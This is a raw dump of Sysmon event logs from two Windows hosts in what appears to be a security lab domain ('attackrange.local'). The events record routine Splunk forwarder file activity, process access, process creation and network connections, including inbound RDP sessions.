23542300x80000000000000001049713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:35.231{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7EEF2A72DB56E39B5C5C1470AB9C429,SHA256=F4CF7C6916C0C36F82A9A67EB36D571CE6F4684B7FC578A9C22CCF8228E74A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978387Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:35.212{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72F2C4F033636590A909A51C4A2FC0F,SHA256=66A236A04A0AE85E1D42658C39AA867B2D14CC666BA0C42C208ED830EA4368D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:36.579{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:36.428{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A80CEC213142BF4B4C8A28A5BE172AF7,SHA256=E38514B1F1365BC42356C9C1DDDCB41BEEAF296FB92F6308B414C72C685C6737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978389Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:36.261{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3722623C17522F941467F607FB4EFCCC,SHA256=7DEC52921E258E88AEBA258D24B689BC6B202859A48DBA3181348BB3EAFC6AA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978388Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:31.855{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59358-false10.0.1.12-8000- 23542300x80000000000000001049716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:37.496{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4FA888ED7A9F648307D6AFA325BF05,SHA256=88E372F1800931BD9E3E56505632916961A1A0990E4CDD61DC869298B4E06F86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978403Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A51-6151-B879-00000000FD01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978402Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978401Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978400Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978399Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978398Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978397Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978396Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978395Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978394Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978393Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A51-6151-B879-00000000FD01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978392Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.587{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A51-6151-B879-00000000FD01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978391Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.572{69CF5F33-8A51-6151-B879-00000000FD01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978390Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.493{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1715AB02C87ED7FA4868C1565F2CA501,SHA256=144EF07187EF2F591D29E8861B2167884A9D2F6ACC7C5B678CAF2C0CCF4C51E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978406Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:38.805{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B63C3D076CEA7D0CECCAE2C48750FB7,SHA256=1F58BCE8E57FB089A17C84DD0DD9AD3DF395BDB10BD3E9ABB6CCCBD17A08A7A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978405Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:38.805{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79F6F818EA4FAA4C0F7913F0FB2D6B94,SHA256=74ED219EF01C0771FCD75498595316DB215B6CD0CC274D6E4FE782E17A99A645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978404Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:38.727{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F8CD7E69BC5953016E3EF71EB80BB2E,SHA256=D416D270ACA79E56684FB3A7091457429060F43427FDC722C61618297EA85EFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:38.530{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F99E3709165BA421C87D24434498C6,SHA256=D34563005ED0C2C5051F6CB4BAF80ADF68EFF5225064DBC72B0BDF56DB0CE7CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:36.255{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53334-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000978408Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:39.758{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C444584C3F15EA76AD0B674ECB25691F,SHA256=F3668F0F1D7B5B7D93AAABC6DDA833AB75A6FF4BCE14125F18661C8433FE16F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:39.548{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB6C2E1A71B13D006A2EBA39AAF2BC32,SHA256=B62B027AEEAC8B0B5135A1396A92119752DE0D07C72A019196E5E4E4652D8930,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:36.857{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53335-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000978407Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:36.204{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49710-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:39.248{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3BA33DB9531E49545D1D3883FB40C4CF,SHA256=1FDCACEA31B70C17CB6B4A901FD51A968F430D8C4B0E09BD0F19DEBDAC4C7B4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978412Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:40.759{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE521B53A67FE4DB37EAADF71D9A7122,SHA256=143412B8146D3861E08B0357A3B76DF087B30DED3ED9CA9310C6055098D22772,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:37.833{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50044-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:40.563{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F4D4A978221DB45961832C841EA88CD,SHA256=0F54A79290566AAE3D452204D470B355DCC9C88CA9EFBB8C22FF26BD13340367,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978411Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.840{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59359-false10.0.1.12-8000- 354300x8000000000000000978410Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:37.660{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58655-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978409Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:40.352{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B63C3D076CEA7D0CECCAE2C48750FB7,SHA256=1F58BCE8E57FB089A17C84DD0DD9AD3DF395BDB10BD3E9ABB6CCCBD17A08A7A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:40.048{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EF11EBD10E766B2EDEDCC2CC90BEAB4B,SHA256=995FFF4299996BCE8A36BB7AFEEF7A5EB606AB3C9A8ECED09AC89290FB137B8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:40.048{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81C280FA180D61F0D10F65BB5930EC41,SHA256=A72C27A1997409F734DCF811B1284C76D0F3CE7387778858AC8A23B6B49A7894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978413Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:41.805{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC74F77210924C83A8EC7186ABF4968,SHA256=29DE25952B8E9E46A558E8000D12F49AED7C77B49F4814BAD11F5ED0959F2DDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:41.578{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D32064CAB9A09D8EF9CD329378720D,SHA256=36E6C266053C2866EE173F7E9D7A2904FF92D1888F278AA9AB49121DB620DE32,IMPHASH=00000000000000000000000000000000falsetrue 